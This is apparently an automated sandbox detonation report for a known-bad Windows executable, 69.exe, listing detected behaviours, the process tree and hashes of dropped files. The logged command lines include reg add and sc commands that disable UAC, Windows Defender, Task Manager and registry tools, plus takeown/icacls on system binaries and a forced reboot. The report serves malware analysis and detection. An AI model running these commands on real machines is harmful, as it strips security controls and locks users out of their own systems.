Analysis Overview
SHA256
6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Threat Level: Known bad
The file 69.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Stops running service(s)
Disables Task Manager via registry modification
Possible privilege escalation attempt
Executes dropped EXE
Modifies file permissions
Enumerates connected drives
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Delays execution with timeout.exe
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-10 22:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-10 22:41
Reported
2024-10-10 22:42
Platform
win11-20240802-en
Max time kernel
9s
Max time network
22s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\exec.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\K: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\unregmp2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\exec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\jumpscare.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Delays execution with timeout.exe
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69.exe
"C:\Users\Admin\AppData\Local\Temp\69.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
C:\PerfLogs\windows\exec.exe
"C:\PerfLogs\windows\exec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE70.tmp\AE71.tmp\AE72.bat C:\PerfLogs\windows\exec.exe"
C:\PerfLogs\windows\jumpscare.exe
jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
rnbowspam.exe
C:\Windows\System32\takeown.exe
takeown /f taskmgr.exe
C:\Windows\System32\takeown.exe
takeown /f sethc.exe
C:\Windows\System32\icacls.exe
icacls "sethc.exe" /granted "Admin":F
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AFC9.tmp\AFC9.tmp\AFCA.bat C:\PerfLogs\windows\rnbowspam.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AFC8.tmp\AFC9.tmp\AFCA.bat C:\PerfLogs\windows\jumpscare.exe"
C:\Windows\System32\icacls.exe
icacls "taskmgr.exe" /granted "Admin":F
C:\Windows\System32\takeown.exe
takeown /f reg.exe
C:\Windows\System32\icacls.exe
icacls "reg.exe" /granted "Admin":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Program Files\Windows Media Player\wmplayer.exe
wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
C:\Windows\system32\takeown.exe
takeown /f regedit.exe
C:\Windows\System32\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\icacls.exe
icacls "regedit.exe" /granted "Admin":F
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004CC
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\shutdown.exe
shutdown -r -t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39f4055 /state1:0x41c64e6d
C:\Windows\system32\timeout.exe
timeout /t 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
C:\PerfLogs\windows\warn.vbs
| MD5 | 2f1738d26b35388f87f905ecc98cf408 |
| SHA1 | f1d20ac33b739f3d50d30891b743ef4374abbc5f |
| SHA256 | 83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba |
| SHA512 | e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2 |
C:\PerfLogs\windows\exec.exe
| MD5 | 236f1bc0ecb98edb8efdc31da513e819 |
| SHA1 | 47cc4e73c0f6d717eba708cf468bf6ecb9970086 |
| SHA256 | 517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4 |
| SHA512 | e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109 |
C:\Users\Admin\AppData\Local\Temp\AE70.tmp\AE71.tmp\AE72.bat
| MD5 | 47814c389b7e63ed5a13aa8dcc435f23 |
| SHA1 | 06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7 |
| SHA256 | 2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48 |
| SHA512 | 0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382 |
C:\PerfLogs\windows\jumpscare.exe
| MD5 | 5425f894a45d90bac30ff9a34d2ad2f3 |
| SHA1 | 3d9b9708b4eb917142e7fb59ba61534db2c84e7b |
| SHA256 | 5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2 |
| SHA512 | 9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7 |
C:\PerfLogs\windows\rnbowspam.exe
| MD5 | e000d863f54529348b39030cbaf19aad |
| SHA1 | 9138d2cb83508bf24edee9cb581f60700a1c2b9b |
| SHA256 | 5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea |
| SHA512 | 72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df |
C:\Users\Admin\AppData\Local\Temp\AFC9.tmp\AFC9.tmp\AFCA.bat
| MD5 | 517cae8cc74a0ef3cff3ca7f7dc1aa34 |
| SHA1 | af1538a03dfa1678ab2117c715682527e22f2450 |
| SHA256 | a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194 |
| SHA512 | 8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573 |
C:\Users\Admin\AppData\Local\Temp\AFC8.tmp\AFC9.tmp\AFCA.bat
| MD5 | 5b094d5e0e750e15ab5628f608756249 |
| SHA1 | c73caec179b8baf3833413aaab31c384c48ccd45 |
| SHA256 | 5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f |
| SHA512 | 5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d |
C:\PerfLogs\windows\rainbow.bat
| MD5 | 9d25a94b77c178f0d19bdd8440aaaade |
| SHA1 | c732a091461e0ebbd69f6f64b70016e13856908c |
| SHA256 | 55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9 |
| SHA512 | e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d |
C:\PerfLogs\windows\logon_overwrte.exe
| MD5 | f8df0742068fa14d5a4502de32acf41b |
| SHA1 | f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0 |
| SHA256 | 9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc |
| SHA512 | e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 5433eab10c6b5c6d55b7cbd302426a39 |
| SHA1 | c5b1604b3350dab290d081eecd5389a895c58de5 |
| SHA256 | 23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131 |
| SHA512 | 207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
| MD5 | 90be2701c8112bebc6bd58a7de19846e |
| SHA1 | a95be407036982392e2e684fb9ff6602ecad6f1e |
| SHA256 | 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf |
| SHA512 | d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe |
C:\PerfLogs\windows\killrunas.vbs
| MD5 | fb63b21fb318509a75324b1037da7876 |
| SHA1 | ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1 |
| SHA256 | 3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05 |
| SHA512 | 03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1 |
C:\PerfLogs\windows\69rnspam.exe
| MD5 | 727793378d36b60cae54319b2f5e9e4d |
| SHA1 | 2171ea2f0ea01b39c71ea216a945816fa9ffe751 |
| SHA256 | b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2 |
| SHA512 | 66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91 |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | cb7e01aa7934596717166c67842937f6 |
| SHA1 | 28d4ed6dae0fe6bc4a85196c9de201ddae4cadda |
| SHA256 | 37aa3efbf96d63e646ad768f3b43a35297662efdddae4c529ca33d25579b8a6f |
| SHA512 | 4b725df5e6cc2ff8b5e7458d7a061cb14d7a8fdf1b3b57c1fb036ed6c5a8080154c6f9fffac39a771ca5d4c073e2e749a883ec369d2ffc65e779528ad978e26f |
C:\PerfLogs\windows\tape.mp4
| MD5 | 3784764b2a5db2e23e744eaff79f40c8 |
| SHA1 | 33994de53dcf82b834961421b863181763166954 |
| SHA256 | 2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf |
| SHA512 | f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | dc31533c3ea8ac6915e86cb90616e9e2 |
| SHA1 | 8a429df5fbc9b3f7824742d9e073221829f117ad |
| SHA256 | bcca4709f1d4bb902584d9fb49b341824cc1320d59e9e05eda0c65cc0f75eab6 |
| SHA512 | 7141494a9c11bbf1b9ab97cdcba758a3c231c85a86112990b6685d05e550bee4f05e781592db253b623bdd3bbb0e8e04ad4ca4aeff23468ef4320fc28a93423c |
C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt
| MD5 | a6ef45b0aa8443dfea5daaa1bac6a671 |
| SHA1 | b27edc165fd8c892af4442698e623d14dfa87899 |
| SHA256 | 6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2 |
| SHA512 | 13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de |